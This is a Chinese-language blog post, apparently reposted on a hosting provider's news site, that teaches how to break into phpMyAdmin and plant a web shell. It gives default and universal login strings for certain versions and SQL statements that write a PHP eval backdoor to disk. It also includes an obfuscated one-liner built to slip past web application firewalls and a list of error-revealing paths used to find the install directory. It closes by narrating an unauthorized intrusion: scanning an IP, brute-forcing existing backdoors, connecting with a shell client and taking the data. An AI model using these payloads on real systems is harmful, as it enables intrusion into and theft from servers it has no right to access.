您好,登錄后才能下訂單哦!
小編給大家分享一下PHPmyadmin漏洞以及拿shell的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!
phpmyadmin的漏洞相對來說,還是比較多的,對于新手來說,分享幾個漏洞,深入的處于代碼審計方面的也可以和我討論
phpmyadmin2.11.3-2.11.4 這兩個版本存在萬能密碼,直接使用‘localhost’@'@”為賬號,密碼不用輸入。
phpmyadmin2.11.9.2 這個版本存在空口令。直接root用戶登陸,密碼不用
找這個的話 用自己的寫的腳本,或者搜素引擎什么的,這里懂的人就懂了,不懂也不在這里。
關于拿shell,----》root權限,并且有寫文件權限 ----》導出的目錄有寫權限 ----》有的情況下,就算你這兩個都有,但是服務器的一些配置還是會對這個有影響。
在getshell之前先進入一個數(shù)據(jù)庫
第一種,使用sql語句,創(chuàng)建一個表,添加一個字段,字段的內(nèi)容為一句話,然后導出到php文件中,最后刪除這個表,這個是最保險的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('<?php eval($_POST[mima])?>')
select 列 from 表 into _utfile '路徑'
Drop TABLE IF EXISTS 表;
第二種方法,這個是直接寫入
select '一句話'INTO _UTFILE '路徑'
還有幾種方法,大致原理都一樣。
然后,一般的話,一句話都是
<?php @eval($_POST[x])?>
有狗的話,用免殺一句話,下面這個是我過年前構造的過狗一句話,現(xiàn)在應該還可以過
<?php $a = 's'; $str = str_repeat($a,2); $to = $_POST; //echo $str; $exp = 'a'.$str[0].$str[1].'e'.'r'.'t'; $exp($to['x']) ?>
找路徑的話,
1// 利用phpinfo.php 2//利用phpmyadmin的一些文件報錯,下面都是網(wǎng)上通用的 /phpMyAdmin/index.php?lang[]=1 /phpMyAdmin/phpinfo.php /load_file() /phpmyadmin/themes/darkblue_orange/layout.inc.php /phpmyadmin/libraries/select_lang.lib.php /phpmyadmin/libraries/lect_lang.lib.php /phpmyadmin/libraries/mcrypt.lib.php /phpmyadmin/libraries/export/xls.php
3//再者就是利用網(wǎng)站包路徑,這些會的都會了,不會的慢慢的就會了。
下面開始實戰(zhàn),腳本掃到一個IP,顯示存在phpmyadmin,打開
一看這些php文件就是后門一句話,放到幾萬字典爆破,兩秒鐘
直接菜刀鏈接。。。。。
這個肯定被人搞了,直接打包好東西,你懂的。。。提權什么的就不必要了。
以上是“PHPmyadmin漏洞以及拿shell的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業(yè)資訊頻道!
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內(nèi)容。